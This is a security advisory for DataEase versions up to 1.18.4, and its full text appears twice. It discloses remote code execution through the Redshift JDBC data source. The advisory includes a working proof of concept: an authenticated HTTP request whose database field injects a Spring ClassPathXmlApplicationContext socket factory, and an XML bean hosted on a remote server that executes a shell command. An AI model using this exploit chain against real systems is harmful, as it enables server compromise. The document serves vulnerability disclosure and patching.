Impact
In Dataease, a normal user can handle the data source. the AWS datasource redshift in the data source function doesn't do properly security measures that will lead to remote code execution。
A normal user can input some properties that connected to the AWS Redshift。
The Redshift does not accept the EXTRA_PARAMS like other database like pgsql or mysql. But that is not a problem to construct a remote code execution.

The database filed doesn't normalize , so just build a database name like that test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}
The complete configuration just like
configuration = { "initialPoolSize":5,"schema":"jdbc",
"extraParams": "",
"minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,
"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100",
"dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}".format(payload),
"username":"test","password":"test","port":"5432"}
And then will trigger the redshift execution remote code just like pgsql
from com.amazon.redshift.Driver#connect
then trigger at com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory
POC
POST /datasource/validate/ HTTP/1.1 Host: 192.168.0.102 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN Accept-Encoding: gzip, deflate Content-Type: application/json Authorization: [A normal user token] LINK-PWD-TOKEN: null Content-Length: 889 Origin: http://192.168.0.102/ Connection: close Referer: http://192.168.0.102/
{"configuration":"eyJpbml0aWFsUG9vbFNpemUiOjUsInNjaGVtYSI6ImpkYmMiLCJleHRyYVBhcmFtcyI6IiIsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NTAsIm1heElkbGVUaW1lIjozMCwiYWNxdWlyZUluY3JlbWVudCI6NSwiaWRsZUNvbm5lY3Rpb25UZXN0UGVyaW9kIjo1LCJjb25uZWN0VGltZW91dCI6NSwiY3VzdG9tRHJpdmVyIjoiZGVmYXVsdCIsInF1ZXJ5VGltZW91dCI6MzAsImhvc3QiOiIxOTIuMTY4LjAuMTAwIiwiZGF0YUJhc2UiOiJ0ZXN0P3NvY2tldEZhY3Rvcnk9b3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuQ2xhc3NQYXRoWG1sQXBwbGljYXRpb25Db250ZXh0JnNvY2tldEZhY3RvcnlBcmc9aHR0cDovLzE5Mi4xNjguMC4xMDA6NDgwODAvY2FsY3VsYXRvcjIueG1sIiwidXNlcm5hbWUiOiJ0ZXN0IiwicGFzc3dvcmQiOiJ0ZXN0IiwicG9ydCI6IjU0MzIifQ==","apiConfiguration":[],"type":"redshift","name":"test","configurationEncryption":true}
The configuration base64 decode is
{"initialPoolSize":5,"schema":"jdbc","extraParams":"","minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100","dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml","username":"test","password":"test","port":"5432"}
And make a http server at 192.168.0.100:48080 serve a file calculator2.xml
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd
">
<bean id="pb" class="javax.script.ScriptEngineManager" >
<property name="message" value="#{ pb.getEngineByName('nashorn').eval('java.lang.Runtime.getRuntime().exec(''touch /tmp/redshift2'')') }" />
</bean>
</beans>
Affected versions: <= 1.18.4
Patches
The vulnerability has been fixed in v1.18.5.
Workarounds
It is recommended to upgrade the version to v1.18.5.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at wei@fit2cloud.com
Impact
In Dataease, a normal user can handle the data source. the AWS datasource redshift in the data source function doesn't do properly security measures that will lead to remote code execution。
A normal user can input some properties that connected to the AWS Redshift。
The Redshift does not accept the EXTRA_PARAMS like other database like pgsql or mysql. But that is not a problem to construct a remote code execution.
The database filed doesn't normalize , so just build a database name like that test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}
The complete configuration just like
configuration = { "initialPoolSize":5,"schema":"jdbc", "extraParams": "", "minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5, "connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100", "dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}".format(payload), "username":"test","password":"test","port":"5432"}And then will trigger the redshift execution remote code just like pgsql
from com.amazon.redshift.Driver#connect
then trigger at com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory
POC
POST /datasource/validate/ HTTP/1.1 Host: 192.168.0.102 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN Accept-Encoding: gzip, deflate Content-Type: application/json Authorization: [A normal user token] LINK-PWD-TOKEN: null Content-Length: 889 Origin: http://192.168.0.102/ Connection: close Referer: http://192.168.0.102/{"configuration":"eyJpbml0aWFsUG9vbFNpemUiOjUsInNjaGVtYSI6ImpkYmMiLCJleHRyYVBhcmFtcyI6IiIsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NTAsIm1heElkbGVUaW1lIjozMCwiYWNxdWlyZUluY3JlbWVudCI6NSwiaWRsZUNvbm5lY3Rpb25UZXN0UGVyaW9kIjo1LCJjb25uZWN0VGltZW91dCI6NSwiY3VzdG9tRHJpdmVyIjoiZGVmYXVsdCIsInF1ZXJ5VGltZW91dCI6MzAsImhvc3QiOiIxOTIuMTY4LjAuMTAwIiwiZGF0YUJhc2UiOiJ0ZXN0P3NvY2tldEZhY3Rvcnk9b3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuQ2xhc3NQYXRoWG1sQXBwbGljYXRpb25Db250ZXh0JnNvY2tldEZhY3RvcnlBcmc9aHR0cDovLzE5Mi4xNjguMC4xMDA6NDgwODAvY2FsY3VsYXRvcjIueG1sIiwidXNlcm5hbWUiOiJ0ZXN0IiwicGFzc3dvcmQiOiJ0ZXN0IiwicG9ydCI6IjU0MzIifQ==","apiConfiguration":[],"type":"redshift","name":"test","configurationEncryption":true}The configuration base64 decode is
{"initialPoolSize":5,"schema":"jdbc","extraParams":"","minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100","dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml","username":"test","password":"test","port":"5432"}And make a http server at 192.168.0.100:48080 serve a file calculator2.xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd "> <bean id="pb" class="javax.script.ScriptEngineManager" > <property name="message" value="#{ pb.getEngineByName('nashorn').eval('java.lang.Runtime.getRuntime().exec(''touch /tmp/redshift2'')') }" /> </bean> </beans>Affected versions: <= 1.18.4
Patches
The vulnerability has been fixed in v1.18.5.
Workarounds
It is recommended to upgrade the version to v1.18.5.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at wei@fit2cloud.com